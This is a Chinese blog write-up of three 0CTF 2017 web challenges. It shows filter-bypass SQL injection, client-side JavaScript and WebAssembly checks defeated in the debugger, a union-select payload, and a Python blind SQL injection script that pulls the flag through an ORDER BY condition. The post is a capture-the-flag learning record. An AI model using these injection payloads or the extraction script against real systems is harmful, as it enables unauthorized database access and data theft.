0ctf 部分web writeup.md

最新推荐文章于 2022-01-12 10:52:06 发布
最新推荐文章于 2022-01-12 10:52:06 发布
阅读量1.4k 收藏
点赞数
分类专栏: WriteUp 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ni9htMar3/article/details/64522738
版权

simplesqlin

这个题尝试点击,注入点是id,发现他把一些关键字符过滤了,如selectfrom 等,那样经过查找资料,可利用/**/00%0b绕过过滤,经过尝试%00%0b都可以,那样构造payload
得到数据库news
这里写图片描述

得到表flag
这里写图片描述

得到列flag
这里写图片描述

最终得到flag
这里写图片描述

KoG

King of Glory is a funny game. Our website has a list of players.

查看源码,是一道关于js的题

function GetUrlParms()
{
    var args=new Object();
    var query=location.search.substring(1);
    var pairs=query.split("&");
    for(var i=0;i<pairs.length;i++)
    {
        var pos=pairs[i].indexOf('=');
        if(pos==-1) continue;
        var argname=pairs[i].substring(0,pos);
        var value=pairs[i].substring(pos+1);
        args[argname]=unescape(value);
    }
    return args;
}
function go()
{
    args = GetUrlParms();
    if(args["id"]!=undefined)
    {
        var value = args["id"];
        var ar = Module.main(value).split("|");
        if(ar.length==3)
        {
            var s = "api.php?id=" + args["id"] + "&hash=" + ar[0] + "&time=" + ar[1];
            $(document).ready(function(){
              content=$.ajax({url:s, async:false});
              $("#output").html(content.responseText);
            });

        }
        if((ar.length==1)&(ar[0]=='WrongBoy'))
        {
            alert('Hello Hacker~');
        }
    }
}

var wait = setInterval(function(){if(Module.main != undefined){clearInterval(wait);go();}}, 100);

这个当你输入带有敏感的字符,便会返回wrongBoy,并弹窗

这样的话,只要利用chrome进行单步调试,将不一样的判断语句除掉就可以

通过不间断的调试,可知道第一个不一样的地方,这时将$13true就可以

第二个位置就是$42的值,当正确的时候$42true,致使label0,而错误的时候label12进入中断,这样只要使if(0)就可以
之后就能正常的注入了,不过由于同源策略的原因,异步请求交不过去,所以把源码改成如下

<!DOCTYPE html> <html> <head> <title>King of Glory Player List</title> </head> <body> <script
  src="https://code.jquery.com/jquery-3.1.1.min.js"
  integrity="sha256-hVVnYaiADRTO2PzUGmuLJr8BLUSjGIZsDYGmIJLv2b8="
  crossorigin="anonymous"></script> <script src="function1.js"></script> <script type="text/javascript">
function GetUrlParms()
{
    var args=new Object();
    var query=location.search.substring(1);
    var pairs=query.split("&");
    for(var i=0;i<pairs.length;i++)
    {
        var pos=pairs[i].indexOf('=');
        if(pos==-1) continue;
        var argname=pairs[i].substring(0,pos);
        var value=pairs[i].substring(pos+1);
        args[argname]=unescape(value);
    }
    return args;
}
function go()
{
    args = GetUrlParms();
    if(args["id"]!=undefined)
    {
        var value = args["id"];
        var ar = Module.main(value).split("|");
        if(ar.length==3)
        {
            var s = "http://202.120.7.213:11181/api.php?id=" + args["id"] + "&hash=" + ar[0] + "&time=" + ar[1];
            window.location.href=s;
            $(document).ready(function(){
              content=$.ajax({url:s, async:false});
              $("#output").html(content.responseText);
            });

        }
        if((ar.length==1)&(ar[0]=='WrongBoy'))
        {
            alert('Hello Hacker~');
        }
    }
}

var wait = setInterval(function(){if(Module.main != undefined){clearInterval(wait);go();}}, 100);

</script> <center><h1>King of Glory Player List</h1></center> <center><div id="output"><h2>hmmmm</h2></div></center> </body> </html>

function1.js就是我们调整过得,接下来就能正常的发送请求了。

发现服务端并没有再进行过滤了,然后由这个payload

id=1 order by 2

确定是2列了。
然后开始爆破
表名有fl4g,user
fl4g列名就一个hey
所以

?id=1 and 1=2 union select 1,hey from fl4g

拿到flag。
这里写图片描述

Temmo’s Tiny Shop

Enjoy online shopping? It’s so convenient, and I like it very much.

这是一道条件竞争的题,当有钱后买hint

select flag from ce63e444b0d049e9c899c9a0336b3c59

这明显就是注入题,首先找注入点在哪
发现在搜索的orderby处
这里写图片描述

这里写图片描述

通过if语句进行逐字判断

脚本

import requests
import string 

dic=string.ascii_letters+'0123456789~!*()-{}_'
r=requests.session()
url = 'http://202.120.7.197/app.php'  
header={"Cookie":"PHPSESSID=3lqjrmgiuurlnmgerokt0kk8o6"}

def sendsort(TEMPLATE):  
    data = TEMPLATE
    #print data
    content=r.get(url+data,headers=header).content
    if content.find('"id":"5"')>content.find('"id":"2"'): 
        return 1  
    else:  
        return 0   
TEMPLATE = "?action=search&keyword=&order=if(substr((select(flag)from(ce63e444b0d049e9c899c9a0336b3c59)),%d,1)like(%s),price,name)"
flag = []  

for i in range(1,40):
    for j in dic:
        print j,
        if sendsort(TEMPLATE%(i,hex(ord(j)))) == 1:
            print 'ok' 
            flag.append(j)
            break
        else:
            print 'no'

print 'Flag:',''.join(flag)

得到flag
这题好坑,爆出来好多_%,还不区分大小写
这里写图片描述

「已注销」
关注
专栏目录
备战CTF做题题解
weixin_40707492的博客
07-21 6670
备战CTF初期,没有什么经验,部分操作过程有借鉴大佬
Seccon CTF 2016 部分Writeup.md
Bendawang's Blog
12-15 2572
Seccon CTF 2016 部分Writeup
某行业_CTF部分Writeup
Keepb1ue的博客
01-12 7781
目录WEB简单的Web足迹NoRCEGiveMeSecretMisc不止止base64失眠的夜High quality men WEB 简单的Web <?php highlight_file(__FILE__); error_reporting(0); echo "try to read source ?action="; $action = $_GET['action']; if (isset($action)) { if (p
CTF-writeup
03-19
CTF-writeup
CTFWeb-BUUCTF竞赛真题WriteUp(1)
道阻且长,行则将至。
08-20 8277
BUUCTF (北京联合大学CTF)平台拥有大量免费的 CTF 比赛真题环境: 此处记录下部分 Web 题目练习过程。 N0.1 强网杯-高明的黑客 1、创建并访问靶机: 2、根据题目提示,访问并下载 www.tar.gz: 打开压缩包,发现有3000多个php文件,尝试搜索flag文件,未果。于是打开php文件进行代码审计,发现代码中存在大量使用 system()/eval()/assert() 等函数执行 get 或 post 传递的参数,这意味我们也许可以通过传递参数的方式来执行任意命令。
23. CTF综合靶机渗透(十六)
weixin_30564785的博客
08-19 1130
靶机说明: VM Name: JIS-CTF : VulnUpload Difficulty: Beginner Description: There are five flags on this machine. Try to find them. It takes 1.5 hour on average to find all flags. Only working with Virt...
2018第二届强网杯线上赛ctf web writeup(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
本文主要涉及的是网络安全领域中的CTF(Capture The Flag)竞赛,特别是Web安全相关的挑战。在2018年的第二届强网杯线上赛中,存在一系列难度较大的Web题目,这些题目主要测试参赛者的Web安全技能,包括但不限于密码...
ctf PHP一句话木马,网络内生安全试验场——CTF答题夺旗赛(第三季)Web详细Writeup...
weixin_33903769的博客
03-20 1428
CTF夺旗赛第三季WEB题目Writeup这次比赛的Web题目都比较基础,总共有五道,考察的知识点也都比较明显,所以借这次的题目来简单介绍一下几种漏洞的简单利用方法,下面的解题过程有的地方会写的比较细,主要是写给我们萌新看的,大佬们轻喷。weak题目难度 ⭐php中有两种比较的符号 == 与 === ,=== 在进行比较的时候,会先判断两种字符串的类型是否相等,再比较== 在进行比较的时候,会先将...
收集各大比赛的题目和Writeup.zip
最新发布
09-30
【标题】: "收集各大比赛的题目和Writeup.zip" 涵盖的内容主要与网络安全竞赛,特别是Capture The Flag(CTF)比赛相关。CTF是一种流行的信息安全竞赛形式,参与者通过解决各种技术挑战来提升自己的信息安全技能。...
CTF平台题库writeup(一)--南邮CTF-WEB部分
热门推荐
渗透、攻防、CTF、编程
06-25 1万+
WEB题 1.签到题 题目:key在哪里? writeup:查看源代码即可获得flag! 2.md5 collision 题目: <?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}"; } else {
某校赛的题解...再膜鸡哥
Assassin
10-02 1123
真是菜的一逼…WEB生疏了小小总结一下。 两道0ctf的原题0ctf Temmo’s Tiny Shop part1打开了首先发现了再搜索的order位置存在过滤Waf,感觉是一个注入,但是只是一个猜想,但是感觉过滤的东西实在是太多了…以为思路错了…转而一想是不是买和卖的条件竞争呢?但是一开始一直卡在同一用户为啥不行????然后换了个套路用不同的套接字就行了…用两个cookie,gg,我用的两
南邮CG-CTFWeb writeup第二部分
Senimo
08-04 1716
南邮CG-CTFWeb writeup第二部分伪装者Header上传绕过SQL注入1pass check起名字真难密码重置php 反序列化SQL Injection综合题systemSQL注入2综合题2密码重制2file_get_contents变量覆盖2注意!!HateITAnonymous 南邮CG-CTF链接 伪装者 Header 上传绕过 SQL注入1 pass check 起名字真难 ...
CTF条件竞争
夏日 の blog
02-10 2698
简介 条件竞争是指一个系统的运行结果依赖于不受控制的事件的先后顺序。当这些不受控制的事件并没有按照开发者想要的方式运行时,就可能会出现 bug。尤其在当前我们的系统中大量对资源进行共享,如果处理不当的话,就会产生条件竞争漏洞。 个人理解 通俗的来讲就是假设程序同时处理存钱和取钱,当取钱"速度"大于存钱时,可能就会出现取钱后程序还未来得及将金额减少,程序又立马处理存钱,由此产生非预期的结果。 竞争...
FireShell CTF 2019小记
郁离歌丶的博客
03-20 1017
FireShell CTF 2019小记 8说了,国际赛的难度大家都晓得滴。看题 Python Learning Environment 沙盒逃逸orz,最近喜欢玩的一个东东。 在前端的python.js里面可以看到一些waf源码。不过还没有我自己fuzz来的快,毕竟前端也不是很熟,源码又太多。 fuzz结果:不能用数字,不能用[],还有一堆常见的关键词需要绕过。以及内置函数只剩下exec和pri...
mysql 00FALSE_False注入,以及SQL注入技巧总结
weixin_34976470的博客
01-30 443
title: False注入,以及SQL注入技巧总结date: 2017-04-25 00:23:31tags: ['SQL注入']利用False我们可以绕过一些特定的WAF以及一些未来不确定的因素,其中有些姿势之前了解但是没有去深入,这次做一个归纳总结。0x01 False Injection0 :引子首先我们常见的注入1=10<1''=''这些都是基于1=1这样的值得比较的普通注入,下面...
0CTF2017 WEB WriteUp
Bendawang's Blog
03-20 9806
0CTF2017 WEB WriteUp
实战:2019 0ctf final Web Writeup(一)
systemino的博客
07-04 1073
前言 鸽了好久的题解,因为自己事务缠身,一直没时间写一下最近比赛的题解,趁近日有空,来填坑~ 第一次参加0ctf新星赛就拿了冠军,还是非常开心的。比赛过程中,web共4道题,我有幸做出3道,java实在不太擅长,哭了(另一道是ocaml的题目,涉及小trick和逻辑问题,准备放在后面和java一起编写(希望不要咕咕咕了)。这里写出另外两道题目的题解如下: 114514_calcalcalc ...
window.location.search.substring(1);的含义
KLW75
09-27 5506
一句话总结 window.location.search.substring(1) 是截取当前 url 地址?后面所有的内容。 解释: window.location 对象用于获得当前页面的地址 (URL),并把浏览器重定向到新的页面。 window.location 对象所包含的属性中 search表示从问号 (?) 开始的 URL(查询部分) 所以window.location.search表示包含?的所有内容。 window.location.search.subst...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值